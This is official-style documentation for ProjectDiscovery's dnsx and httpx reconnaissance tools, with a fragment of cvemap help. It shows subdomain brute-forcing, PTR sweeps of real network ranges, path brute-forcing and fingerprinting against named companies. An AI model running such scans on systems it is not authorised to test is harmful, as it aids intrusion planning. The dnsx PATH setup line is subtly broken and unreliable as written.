-re, -remote display remotely exploitable cves (AV:N & PR:N | PR:L) (default true)
OUTPUT:
-f, -field value fields to display in cli output. supported: age, kev, template, poc, cwe, vendor, vstatus, epss, product, assignee
-fe, -exclude value fields to exclude from cli output. supported: age, kev, template, poc, cwe, vendor, vstatus, epss, product, assignee
-lsi, -list-id list only the cve ids in the output
-l, -limit int limit the number of results to display (default 50)
-offset int offset the results to display
-j, -json return output in json format
-epk, -enable-page-keys enable page keys to navigate results
DEBUG:
-version Version
-silent Silent
-verbose Verbose
```
## Notes on usage
* CVE datasets gets updated in every 6 hours.
## References
* **[National Vulnerability Database (NVD)](https://nvd.nist.gov/developers)**: Comprehensive CVE vulnerability data.
* **[Known Exploited Vulnerabilities Catalog (KEV)](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)**: Exploited vulnerabilities catalog.
* **[Exploit Prediction Scoring System (EPSS)](https://www.first.org/epss/data_stats)**: Exploit prediction scores.
* **[HackerOne](https://hackerone.com/hacktivity/cve_discovery)**: CVE discoveries disclosure.
* **[Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates)**: Vulnerability validation templates.
* **[Live-Hack-CVE](https://github.com/Live-Hack-CVE/) / [PoC-in-GitHub](https://github.com/nomi-sec/PoC-in-GitHub/)** GitHub Repository: Vulnerability PoCs references.
# Installing dnsx
Learn about how to install and get started with dnsx
Enter the command below in a terminal to install ProjectDiscovery's dnsx using Go.
```bash
go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest
```
```bash
brew install dnsx
```
Supported in **macOS** (or Linux)
```bash
docker pull projectdiscovery/dnsx:latest
```
{/* Docker-specific usage instructions can be found [here](./running#running-with-docker). */}
```bash
https://github.com/projectdiscovery/dnsx/releases
```
* Download the latest binary for your OS.
* Unzip the ready to run binary.
## Installation Notes
* dnsx requires the latest version of [**Go**](https://go.dev/doc/install)
* Add the Go bin path to the system paths. On OSX or Linux, in your terminal use
```
echo export $PATH=$PATH:$HOME/go/bin >> $home/.bashrc
source $home/.bashrc
```
* To add the Go bin path in Windows, [click this link for instructions.](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/)
* The binary will be located in `$home/go/bin/dnsx`
# dnsx Overview
A fast DNS toolkit for running various probes with multiple features
## What is dnsx?
`dnsx` is a fast and multi-purpose DNS toolkit designed for running various probes through the [retryabledns](https://github.com/projectdiscovery/retryabledns) library.
It supports multiple DNS queries, user supplied resolvers, DNS wildcard filtering like [shuffledns](https://github.com/projectdiscovery/shuffledns) etc.
## Features and capabilities
* Simple and easy-to-use utility to query DNS records
* **A, AAAA, CNAME, PTR, NS, MX, TXT, SRV, SOA** query support
* DNS **Resolution** / **Brute-force** support
* Custom **resolver** input support
* Multiple resolver format **(TCP/UDP/DOH/DOT)** support
* **stdin** and **stdout** support
* Automatic **wildcard** handling support
## Additional dnsx resources
As an open source tool with a robust community there are a lot of community-created resources available.
We are happy to share those to offer even more information about our tools.
* [https://www.geeksforgeeks.org/dnsx-dns-toolkit-allow-to-run-multiple-dns-queries/](https://www.geeksforgeeks.org/dnsx-dns-toolkit-allow-to-run-multiple-dns-queries/)
* [https://www.kitploit.com/2020/11/dnsx-fast-and-multi-purpose-dns-toolkit.html?m=0](https://www.kitploit.com/2020/11/dnsx-fast-and-multi-purpose-dns-toolkit.html?m=0)
* [https://blog.projectdiscovery.io/building-your-own-historical-dns-solution-with-dnsx/](https://blog.projectdiscovery.io/building-your-own-historical-dns-solution-with-dnsx/)
Sharing any external resources **is not formal approval or a recommendation** from ProjectDiscovery.
We cannot provide an endorsement of accuracy or validation that content is up-to-date. Anything shared here should be approached with caution.
## Support
Questions about using dnsx? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running dnsx
Learn about running dnsx with examples including commands and output
For all of the flags and options available for `dnsx` be sure to check out the [Usage](/tools/dnsx/usage) page. On this page we share examples running 'dnsx' with specific flags and goals
and the output you can expect from each.
If you have questions, reach out to us through [Help](/help).
## Basic Examples
### DNS Resolving
Filter active hostnames from the list of passive subdomains, obtained from various sources:
```console
subfinder -silent -d hackerone.com | dnsx -silent
a.ns.hackerone.com
www.hackerone.com
api.hackerone.com
docs.hackerone.com
mta-sts.managed.hackerone.com
mta-sts.hackerone.com
resources.hackerone.com
b.ns.hackerone.com
mta-sts.forwarding.hackerone.com
events.hackerone.com
support.hackerone.com
```
Print **A** records for the given list of subdomains:
```console
subfinder -silent -d hackerone.com | dnsx -silent -a -resp
www.hackerone.com [104.16.100.52]
www.hackerone.com [104.16.99.52]
hackerone.com [104.16.99.52]
hackerone.com [104.16.100.52]
api.hackerone.com [104.16.99.52]
api.hackerone.com [104.16.100.52]
mta-sts.forwarding.hackerone.com [185.199.108.153]
mta-sts.forwarding.hackerone.com [185.199.109.153]
mta-sts.forwarding.hackerone.com [185.199.110.153]
mta-sts.forwarding.hackerone.com [185.199.111.153]
a.ns.hackerone.com [162.159.0.31]
resources.hackerone.com [52.60.160.16]
resources.hackerone.com [3.98.63.202]
resources.hackerone.com [52.60.165.183]
resources.hackerone.com [read.uberflip.com]
mta-sts.hackerone.com [185.199.110.153]
mta-sts.hackerone.com [185.199.111.153]
mta-sts.hackerone.com [185.199.109.153]
mta-sts.hackerone.com [185.199.108.153]
gslink.hackerone.com [13.35.210.17]
gslink.hackerone.com [13.35.210.38]
gslink.hackerone.com [13.35.210.83]
gslink.hackerone.com [13.35.210.19]
b.ns.hackerone.com [162.159.1.31]
docs.hackerone.com [185.199.109.153]
docs.hackerone.com [185.199.110.153]
docs.hackerone.com [185.199.111.153]
docs.hackerone.com [185.199.108.153]
support.hackerone.com [104.16.51.111]
support.hackerone.com [104.16.53.111]
mta-sts.managed.hackerone.com [185.199.108.153]
mta-sts.managed.hackerone.com [185.199.109.153]
mta-sts.managed.hackerone.com [185.199.110.153]
mta-sts.managed.hackerone.com [185.199.111.153]
```
Extract **A** records for the given list of subdomains:
```console
subfinder -silent -d hackerone.com | dnsx -silent -a -resp-only
104.16.99.52
104.16.100.52
162.159.1.31
104.16.99.52
104.16.100.52
185.199.110.153
185.199.111.153
185.199.108.153
185.199.109.153
104.16.99.52
104.16.100.52
104.16.51.111
104.16.53.111
185.199.108.153
185.199.111.153
185.199.110.153
185.199.111.153
```
Extract **CNAME** records for the given list of subdomains:
```console
subfinder -silent -d hackerone.com | dnsx -silent -cname -resp
support.hackerone.com [hackerone.zendesk.com]
resources.hackerone.com [read.uberflip.com]
mta-sts.hackerone.com [hacker0x01.github.io]
mta-sts.forwarding.hackerone.com [hacker0x01.github.io]
events.hackerone.com [whitelabel.bigmarker.com]
```
Extract **ASN** records for the given list of subdomains:
```console
subfinder -silent -d hackerone.com | dnsx -silent -asn
b.ns.hackerone.com [AS13335, CLOUDFLARENET, US]
a.ns.hackerone.com [AS13335, CLOUDFLARENET, US]
hackerone.com [AS13335, CLOUDFLARENET, US]
www.hackerone.com [AS13335, CLOUDFLARENET, US]
api.hackerone.com [AS13335, CLOUDFLARENET, US]
support.hackerone.com [AS13335, CLOUDFLARENET, US]
```
Probe using [dns status code](https://github.com/projectdiscovery/dnsx/wiki/RCODE-ID-VALUE-Mapping) on given list of (sub)domains:
```console
subfinder -silent -d hackerone.com | dnsx -silent -rcode noerror,servfail,refused
ns.hackerone.com [NOERROR]
a.ns.hackerone.com [NOERROR]
b.ns.hackerone.com [NOERROR]
support.hackerone.com [NOERROR]
resources.hackerone.com [NOERROR]
mta-sts.hackerone.com [NOERROR]
www.hackerone.com [NOERROR]
mta-sts.forwarding.hackerone.com [NOERROR]
docs.hackerone.com [NOERROR]
```
Extract subdomains from given network range using `PTR` query:
```console
echo 173.0.84.0/24 | dnsx -silent -resp-only -ptr
cors.api.paypal.com
trinityadminauth.paypal.com
cld-edge-origin-api.paypal.com
appmanagement.paypal.com
svcs.paypal.com
trinitypie-serv.paypal.com
ppn.paypal.com
pointofsale-new.paypal.com
pointofsale.paypal.com
slc-a-origin-pointofsale.paypal.com
fpdbs.paypal.com
```
Extract subdomains from given ASN using `PTR` query:
```console
echo AS17012 | dnsx -silent -resp-only -ptr
apiagw-a.paypal.com
notify.paypal.com
adnormserv-slc-a.paypal.com
a.sandbox.paypal.com
apps2.paypal-labs.com
pilot-payflowpro.paypal.com
www.paypallabs.com
paypal-portal.com
micropayments.paypal-labs.com
minicart.paypal-labs.com
```
***
### DNS Bruteforce
Bruteforce subdomains for given domain or list of domains using `d` and `w` flag:
```console
dnsx -silent -d facebook.com -w dns_worldlist.txt
blog.facebook.com
booking.facebook.com
api.facebook.com
analytics.facebook.com
beta.facebook.com
apollo.facebook.com
ads.facebook.com
box.facebook.com
alpha.facebook.com
apps.facebook.com
connect.facebook.com
c.facebook.com
careers.facebook.com
code.facebook.com
```
Bruteforce targeted subdomain using single or multiple keyword input, as `d` or `w` flag supports file or comma separated keyword inputs:
```console
dnsx -silent -d domains.txt -w jira,grafana,jenkins
grafana.1688.com
grafana.8x8.vc
grafana.airmap.com
grafana.aerius.nl
jenkins.1688.com
jenkins.airbnb.app
jenkins.airmap.com
jenkins.ahn.nl
jenkins.achmea.nl
jira.amocrm.com
jira.amexgbt.com
jira.amitree.com
jira.arrival.com
jira.atlassian.net
jira.atlassian.com
```
Values are accepted from **stdin** for all the input types (`-list`, `-domain`, `-wordlist`). The `-list` flag defaults to `stdin`, but the same can be achieved for other input types by adding a `-` (dash) as parameter:
```console
cat domains.txt | dnsx -silent -w jira,grafana,jenkins -d -
grafana.1688.com
grafana.8x8.vc
grafana.airmap.com
grafana.aerius.nl
jenkins.1688.com
jenkins.airbnb.app
jenkins.airmap.com
jenkins.ahn.nl
jenkins.achmea.nl
jira.amocrm.com
jira.amexgbt.com
jira.amitree.com
jira.arrival.com
jira.atlassian.net
jira.atlassian.com
```
#### DNS Bruteforce with Placeholder based wordlist
```bash
$ cat tld.txt
com
by
de
be
al
bi
cg
dj
bs
```
```console
dnsx -d google.FUZZ -w tld.txt -resp
_ __ __
__| | _ __ ___ \ \/ /
/ _' || '_ \ / __| \ /
| (_| || | | |\__ \ / \
\__,_||_| |_||___//_/\_\ v1.1.2
projectdiscovery.io
google.de [142.250.194.99]
google.com [142.250.76.206]
google.be [172.217.27.163]
google.bs [142.251.42.35]
google.bi [216.58.196.67]
google.al [216.58.196.68]
google.by [142.250.195.4]
google.cg [142.250.183.131]
google.dj [142.250.192.3]
```
### Wildcard filtering
A special feature of `dnsx` is its ability to handle **multi-level DNS based wildcards**, and do it so with a very reduced number of DNS requests. Sometimes all the subdomains will resolve, which leads to lots of garbage in the output. The way `dnsx` handles this is by keeping track of how many subdomains point to an IP and if the count of the subdomains increase beyond a certain threshold, it will check for wildcards on all the levels of the hosts for that IP iteratively.
```console
dnsx -l subdomain_list.txt -wd airbnb.com -o output.txt
```
***
### Dnsx as a library
It's possible to use the library directly in your golang programs. The following code snippets is an example of use in golang programs. Please refer to [here](https://pkg.go.dev/github.com/projectdiscovery/dnsx@v1.1.0/libs/dnsx) for detailed package configuration and usage.
```go
package main
import (
"fmt"
"github.com/projectdiscovery/dnsx/libs/dnsx"
)
func main() {
// Create DNS Resolver with default options
dnsClient, err := dnsx.New(dnsx.DefaultOptions)
if err != nil {
fmt.Printf("err: %v\n", err)
return
}
// DNS A question and returns corresponding IPs
result, err := dnsClient.Lookup("hackerone.com")
if err != nil {
fmt.Printf("err: %v\n", err)
return
}
for idx, msg := range result {
fmt.Printf("%d: %s\n", idx+1, msg)
}
// Query
rawResp, err := dnsClient.QueryOne("hackerone.com")
if err != nil {
fmt.Printf("err: %v\n", err)
return
}
fmt.Printf("rawResp: %v\n", rawResp)
jsonStr, err := rawResp.JSON()
if err != nil {
fmt.Printf("err: %v\n", err)
return
}
fmt.Println(jsonStr)
return
}
```
# dnsx Usage
Learn dnsx usage including queries, filters, and configurations
## Access help
Use `dnsx -h` to display all of the help options.
## Help options
```console
INPUT:
-l, -list string list of sub(domains)/hosts to resolve (file or stdin)
-d, -domain string list of domain to bruteforce (file or comma separated or stdin)
-w, -wordlist string list of words to bruteforce (file or comma separated or stdin)
QUERY:
-a query A record (default)
-aaaa query AAAA record
-cname query CNAME record
-ns query NS record
-txt query TXT record
-srv query SRV record
-ptr query PTR record
-mx query MX record
-soa query SOA record
-axfr query AXFR
-caa query CAA record
-any query ANY record
FILTER:
-re, -resp display dns response
-ro, -resp-only display dns response only
-rc, -rcode string filter result by dns status code (eg. -rcode noerror,servfail,refused)
PROBE:
-cdn display cdn name
-asn display host asn information
RATE-LIMIT:
-t, -threads int number of concurrent threads to use (default 100)
-rl, -rate-limit int number of dns request/second to make (disabled as default) (default -1)
UPDATE:
-up, -update update dnsx to latest version
-duc, -disable-update-check disable automatic dnsx update check
OUTPUT:
-o, -output string file to write output
-j, -json write output in JSONL(ines) format
-omit-raw, -or omit raw dns response from jsonl output
DEBUG:
-hc, -health-check run diagnostic check up
-silent display only results in the output
-v, -verbose display verbose output
-raw, -debug display raw dns response
-stats display stats of the running scan
-version display version of dnsx
OPTIMIZATION:
-retry int number of dns attempts to make (must be at least 1) (default 2)
-hf, -hostsfile use system host file
-trace perform dns tracing
-trace-max-recursion int Max recursion for dns trace (default 32767)
-resume resume existing scan
-stream stream mode (wordlist, wildcard, stats and stop/resume will be disabled)
CONFIGURATIONS:
-r, -resolver string list of resolvers to use (file or comma separated)
-wt, -wildcard-threshold int wildcard filter threshold (default 5)
-wd, -wildcard-domain string domain name for wildcard filtering (other flags will be ignored)
```
## Notes on usage
* By default, `dnsx` checks for **A** record.
* By default `dnsx` uses Google, Cloudflare, Quad9 [resolver](https://github.com/projectdiscovery/dnsx/blob/43af78839e237ea8cbafe571df1ab0d6cbe7f445/libs/dnsx/dnsx.go#L31).
* A custom resolver list can be loaded using the `r` flag.
* Domain name (`wd`) input is mandatory for wildcard elimination.
* The DNS record flag cannot be used when using wildcard filtering.
* DNS resolution (`l`) and DNS brute-forcing (`w`) can't be used together.
* VPN operators tend to filter high DNS/UDP traffic, therefore the tool might experience packets loss (eg. [Mullvad VPN](https://github.com/projectdiscovery/dnsx/issues/221))
`dnsx` is made with 🖤 by the [projectdiscovery](https://projectdiscovery.io) team.
# Installing httpx
Learn about how to install and get started with httpx
Enter the command below in a terminal to install ProjectDiscovery's httpx using Go.
```bash
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
```
```bash
brew install httpx
```
Supported in **macOS** (or Linux)
```bash
docker pull projectdiscovery/httpx:latest
```
{/* Docker-specific usage instructions can be found [here](./running#running-with-docker). */}
Enter the commands below in a terminal to install ProjectDiscovery's httpx using GitHub.
```bash
git clone https://github.com/projectdiscovery/httpx.git; \
cd httpx/cmd/httpx; \
go build; \
mv httpx /usr/local/bin/; \
httpx -version;
```
```bash
https://github.com/projectdiscovery/httpx/releases
```
* Download the latest binary for your OS.
* Unzip the ready to run binary.
## Installation Notes
* httpx requires the latest version of [**Go**](https://go.dev/doc/install)
* Add the Go bin path to the system paths. On OSX or Linux, in your terminal use
```
echo export PATH=$PATH:$HOME/go/bin >> $HOME/.bashrc
source $HOME/.bashrc
```
* To add the Go bin path in Windows, [click this link for instructions.](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/)
* The binary will be located in `$home/go/bin/httpx`
# httpx Overview
An HTTP toolkit that probes services, web servers, and other valuable metadata
## What is **httpx?**
httpx is a fast and multi-purpose HTTP toolkit built to support running multiple probes using a public library.
Probes are specific tests or checks to gather information about web servers, URLs, or other HTTP elements.
Httpx is designed to maintain result reliability with an increased number of threads.
Typically, users employ httpx to efficiently identify and analyze web server configurations, verify HTTP responses, and diagnose potential vulnerabilities or misconfigurations.
It can also be in a pipeline that transitions from asset identification to technology enrichment and then feeds into detection of vulnerabilities.
## Features and capabilities
* A simple and modular code base for easy contribution
* Configurable flags to probe multiple elements
* Support for multiple HTTP based probes
* Smart auto-fallback from https to http
* Support for hosts, URLs and CIDR
* Handling for edge cases: retries, backoffs for WAFs
* UI Dashboard for results
## Additional httpx resources
As an open source tool with a robust community there are a lot of community-created resources available.
We are happy to share those to offer even more information about our tools.
ProjectDiscovery’s httpx should not be confused with the httpx python library.Sharing these resources **is not formal approval or a recommendation** from ProjectDiscovery.
We cannot provide an endorsement of accuracy or validation that content is up-to-date. Anything shared here should be approached with caution.
* [https://www.kali.org/tools/httpx-toolkit/](https://www.kali.org/tools/httpx-toolkit/)
* [https://www.hackingarticles.in/a-detailed-guide-on-httpx/](https://www.hackingarticles.in/a-detailed-guide-on-httpx/)
## Support
Questions about using httpx? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running httpx
Learn about running httpx with examples including commands and output
For all of the flags and options available for `httpx` be sure to check out the [Usage](/tools/httpx/usage) page. On this page we'll share examples running httpx with specific flags and goals
and the output you can expect from each.
If you have questions, reach out to us through [Help](/help).
## Basic Examples
### ASN Fingerprint
Use `httpx` with the `-asn` flag for ASN (Autonomous System Number) fingerprinting, an effective technique for mapping the network affiliations of various domains.
```
subfinder -d hackerone.com -silent | httpx -asn
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/ v1.2.1
projectdiscovery.io
Use with caution. You are responsible for your actions.
Developers assume no liability and are not responsible for any misuse or damage.
https://mta-sts.managed.hackerone.com [AS54113, FASTLY, US]
https://gslink.hackerone.com [AS16509, AMAZON-02, US]
https://www.hackerone.com [AS13335, CLOUDFLARENET, US]
https://mta-sts.forwarding.hackerone.com [AS54113, FASTLY, US]
https://resources.hackerone.com [AS16509, AMAZON-02, US]
https://support.hackerone.com [AS13335, CLOUDFLARENET, US]
https://mta-sts.hackerone.com [AS54113, FASTLY, US]
https://docs.hackerone.com [AS54113, FASTLY, US]
https://api.hackerone.com [AS13335, CLOUDFLARENET, US]
```
### ASN Input
Specify an [autonomous system's number (ASN)](https://en.wikipedia.org/wiki/Autonomous_system_\(Internet\)) and `httpx` will fetch all ip addresses of that autonomous system and probe them
```
echo AS14421 | httpx -silent
https://216.101.17.248
https://216.101.17.249
https://216.101.17.250
https://216.101.17.251
https://216.101.17.252
```
### CIDR Input
Run `httpx` with CIDR input (for example 173.0.84.0/24)
```
echo 173.0.84.0/24 | httpx -silent
https://173.0.84.29
https://173.0.84.43
https://173.0.84.31
https://173.0.84.44
https://173.0.84.12
https://173.0.84.4
https://173.0.84.36
https://173.0.84.45
https://173.0.84.14
https://173.0.84.25
https://173.0.84.46
https://173.0.84.24
https://173.0.84.32
https://173.0.84.9
https://173.0.84.13
https://173.0.84.6
https://173.0.84.16
https://173.0.84.34
```
### Docker Run
Use Docker to run `httpx` in an isolated container. For example, by piping subdomain lists into the Docker container, you can seamlessly perform probing across multiple targets, harnessing the power of `httpx` without direct installation requirements.
```
cat sub_domains.txt | docker run -i projectdiscovery/httpx
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/ v1.1.2
projectdiscovery.io
Use with caution. You are responsible for your actions
Developers assume no liability and are not responsible for any misuse or damage.
https://mta-sts.forwarding.hackerone.com
https://mta-sts.hackerone.com
https://mta-sts.managed.hackerone.com
https://www.hackerone.com
https://api.hackerone.com
https://gslink.hackerone.com
https://resources.hackerone.com
https://docs.hackerone.com
https://support.hackerone.com
```
### Error Page Classifier and Filtering
The Error Page Classifier and Filtering feature aims to add intelligence to `httpx` by enabling `httpx` to classify and filter out common error pages returned by web applications.
It is an enhancement geared towards reducing noise and helping focus on actual results.
Using the `-fep` or `-filter-error-page` option creates a filtered error page in the file `filtered_error_page.json` in jsonline format.
```
httpx -l urls.txt -path /v1/api -fep
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/
projectdiscovery.io
[INF] Current httpx version v1.3.3 (latest)
https://scanme.sh/v1/api
```
### Favicon Hash
Extract and display the mmh3 hash of the '/favicon.ico' file from given targets.
```
subfinder -d hackerone.com -silent | httpx -favicon
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/ v1.1.5
projectdiscovery.io
Use with caution. You are responsible for your actions.
Developers assume no liability and are not responsible for any misuse or damage.
https://docs.hackerone.com/favicon.ico [595148549]
https://hackerone.com/favicon.ico [595148549]
https://mta-sts.managed.hackerone.com/favicon.ico [-1700323260]
https://mta-sts.forwarding.hackerone.com/favicon.ico [-1700323260]
https://support.hackerone.com/favicon.ico [-1279294674]
https://gslink.hackerone.com/favicon.ico [1506877856]
https://resources.hackerone.com/favicon.ico [-1840324437]
https://api.hackerone.com/favicon.ico [566218143]
https://mta-sts.hackerone.com/favicon.ico [-1700323260]
https://www.hackerone.com/favicon.ico [778073381]
```
### File/Path Bruteforce
Use `httpx` with the `-path` option for efficient File/Path Bruteforcing. This feature allows probing specific paths across multiple URLs, uncovering response codes and revealing potentially vulnerable or unsecured endpoints in web applications.
```
httpx -l urls.txt -path /v1/api -sc
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/ v1.1.5
projectdiscovery.io
Use with caution. You are responsible for your actions.
Developers assume no liability and are not responsible for any misuse or damage.
https://mta-sts.managed.hackerone.com/v1/api [404]
https://mta-sts.hackerone.com/v1/api [404]
https://mta-sts.forwarding.hackerone.com/v1/api [404]
https://docs.hackerone.com/v1/api [404]
https://api.hackerone.com/v1/api [401]
https://hackerone.com/v1/api [302]
https://support.hackerone.com/v1/api [404]
https://resources.hackerone.com/v1/api [301]
https://gslink.hackerone.com/v1/api [404]
http://www.hackerone.com/v1/api [301]
```
### File Input
Run `httpx` with the `-probe` flag against all the hosts in hosts.txt to return URLs with probed status.
```
httpx -list hosts.txt -silent -probe
http://ns.hackerone.com [FAILED]
https://docs.hackerone.com [SUCCESS]
https://mta-sts.hackerone.com [SUCCESS]
https://mta-sts.managed.hackerone.com [SUCCESS]
http://email.hackerone.com [FAILED]
https://mta-sts.forwarding.hackerone.com [SUCCESS]
http://links.hackerone.com [FAILED]
https://api.hackerone.com [SUCCESS]
https://www.hackerone.com [SUCCESS]
http://events.hackerone.com [FAILED]
https://support.hackerone.com [SUCCESS]
https://gslink.hackerone.com [SUCCESS]
http://o1.email.hackerone.com [FAILED]
http://info.hackerone.com [FAILED]
https://resources.hackerone.com [SUCCESS]
http://o2.email.hackerone.com [FAILED]
http://o3.email.hackerone.com [FAILED]
http://go.hackerone.com [FAILED]
http://a.ns.hackerone.com [FAILED]
http://b.ns.hackerone.com [FAILED]
```
### JARM Fingerprint
Use `httpx` with the `-jarm` flag to leverage JARM fingerprinting, a specialized tool for active TLS server fingerprinting.
This approach enables the identification and categorization of servers based on their TLS configurations, making it an effective method for detecting and analyzing diverse internet servers,
including potential security threats.
```
subfinder -d hackerone.com -silent | httpx -jarm
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/ v1.2.1
projectdiscovery.io
Use with caution. You are responsible for your actions.
Developers assume no liability and are not responsible for any misuse or damage.
https://www.hackerone.com [29d3dd00029d29d00042d43d00041d5de67cc9954cc85372523050f20b5007]
https://mta-sts.hackerone.com [29d29d00029d29d00042d43d00041d2aa5ce6a70de7ba95aef77a77b00a0af]
https://mta-sts.managed.hackerone.com [29d29d00029d29d00042d43d00041d2aa5ce6a70de7ba95aef77a77b00a0af]
https://docs.hackerone.com [29d29d00029d29d00042d43d00041d2aa5ce6a70de7ba95aef77a77b00a0af]
https://support.hackerone.com [29d3dd00029d29d00029d3dd29d29d5a74e95248e58a6162e37847a24849f7]
https://api.hackerone.com [29d3dd00029d29d00042d43d00041d5de67cc9954cc85372523050f20b5007]
https://mta-sts.forwarding.hackerone.com [29d29d00029d29d00042d43d00041d2aa5ce6a70de7ba95aef77a77b00a0af]
https://resources.hackerone.com [2ad2ad0002ad2ad0002ad2ad2ad2ad043bfbd87c13813505a1b60adf4f6ff5]
```
### Tool Chain
Combining `httpx` with other tools like `subfinder` can elevate your web reconnaissance.
For example, pipe results from `subfinder` directly into 'httpx' to efficiently identify active web servers and their technologies across various subdomains of a given target.
```
subfinder -d hackerone.com -silent| httpx -title -tech-detect -status-code
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/ v1.1.1
projectdiscovery.io
Use with caution. You are responsible for your actions
Developers assume no liability and are not responsible for any misuse or damage.
https://mta-sts.managed.hackerone.com [404] [Page not found · GitHub Pages] [Varnish,GitHub Pages,Ruby on Rails]
https://mta-sts.hackerone.com [404] [Page not found · GitHub Pages] [Varnish,GitHub Pages,Ruby on Rails]
https://mta-sts.forwarding.hackerone.com [404] [Page not found · GitHub Pages] [GitHub Pages,Ruby on Rails,Varnish]
https://docs.hackerone.com [200] [HackerOne Platform Documentation] [Ruby on Rails,jsDelivr,Gatsby,React,webpack,Varnish,GitHub Pages]
https://support.hackerone.com [301,302,301,200] [HackerOne] [Cloudflare,Ruby on Rails,Ruby]
https://resources.hackerone.com [301,301,404] [Sorry, no Folders found.]
```
### URL probe
Run `httpx` against all the hosts and subdomains in hosts.txt to return URLs running an HTTP webserver.
```
cat hosts.txt | httpx
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_| v1.1.1
/_/
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
https://mta-sts.managed.hackerone.com
https://mta-sts.hackerone.com
https://mta-sts.forwarding.hackerone.com
https://docs.hackerone.com
https://www.hackerone.com
https://resources.hackerone.com
https://api.hackerone.com
https://support.hackerone.com
```
## UI Dashboard (PDCP Integration)
#### Configure API Key
To upload your assets to PDCP you will need to create a free API Key
* **Obtain API Key:**
* Visit [https://cloud.projectdiscovery.io](https://cloud.projectdiscovery.io)
* Open the setting menu from the top right and select "API Key" to create your API Key
* Use the `httpx -auth` command, and enter your API key when prompted.
#### Configure Team (Optional)
If you want to upload the asset results to a team workspace instead of your personal workspace, you can configure the Team ID. You can use either the CLI option or the environment variable, depending on your preference.
* **Obtain Team ID:**
* To obtain your Team ID, navigate to [https://cloud.projectdiscovery.io/settings/team](https://cloud.projectdiscovery.io/settings/team) and copy the Team ID from the top right section.
![image](https://github.com/user-attachments/assets/76a9f102-1626-4c87-8d9e-37c30417f19e)
* **CLI Option:**
* Use the `-tid` or `-team-id` option to specify the team ID.
* Example: `nuclei -tid XXXXXX -dashboard`
* **ENV Variable:**
* Set the `PDCP_TEAM_ID` environment variable to your team ID.
* Example: `export PDCP_TEAM_ID=XXXXX`
Either of these options is sufficient to configure the Team ID.
#### Run httpx with UI Dashboard
To run `httpx` and upload the results to the UI Dashboard:
```console
$ chaos -d hackerone.com | httpx -dashboard
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/
projectdiscovery.io
[INF] Current httpx version v1.6.6 (latest)
[INF] To view results on UI dashboard, visit https://cloud.projectdiscovery.io/assets upon completion.
http://a.ns.hackerone.com
https://www.hackerone.com
http://b.ns.hackerone.com
https://api.hackerone.com
https://mta-sts.forwarding.hackerone.com
https://docs.hackerone.com
https://support.hackerone.com
https://mta-sts.hackerone.com
https://gslink.hackerone.com
[INF] Found 10 results, View found results in dashboard : https://cloud.projectdiscovery.io/assets/cqd56lebh6us73bi22pg
```
![image](https://blog.projectdiscovery.io/content/images/size/w1600/2024/08/image.png)
#### Uploading to an Existing Asset Group
To upload new assets to an existing asset group:
```console
$ chaos -d hackerone.com | httpx -dashboard -aid existing-asset-id
```
#### Setting an Asset Group Name
To set a custom asset group name:
```console
$ chaos -d hackerone.com | httpx -dashboard -aname "Custom Asset Group"
```
### Additional upload options
* `-pd, -dashboard`: Enable uploading of `httpx` results to the ProjectDiscovery Cloud (PDCP) UI Dashboard.
* `-aid, -asset-id string`: Upload new assets to an existing asset ID (optional).
* `-aname, -asset-name string`: Set the asset group name (optional).
* `-pdu, -dashboard-upload string`: Upload `httpx` output file (jsonl) to the ProjectDiscovery Cloud (PDCP) UI Dashboard.
### Environment Variables
* `export ENABLE_CLOUD_UPLOAD=true`: Enable dashboard upload by default.
* `export DISABLE_CLOUD_UPLOAD_WARN=true`: Disable dashboard warning.
* `export PDCP_TEAM_ID=XXXXX`: Set the team ID for the ProjectDiscovery Cloud Platform.
## Expanded Examples
### Using httpx as a library
httpx can be used as a library by creating an instance of the Option struct and populating it with the same options that would be specified via CLI.
Once validated, the struct should be passed to a runner instance (to be closed at the end of the program) and the RunEnumeration method should be called.
* A basic example of how to use httpx as a library is available in the [GitHub examples](https://github.com/projectdiscovery/httpx/tree/main/examples) folder.
### Using httpx screenshot
Httpx includes support for taking a screenshot with `-screenshot` that gives users the ability to take screenshots of target URLs, pages, or endpoints along with the rendered DOM.
This functionality enables a comprehensive view of the target's visual content.
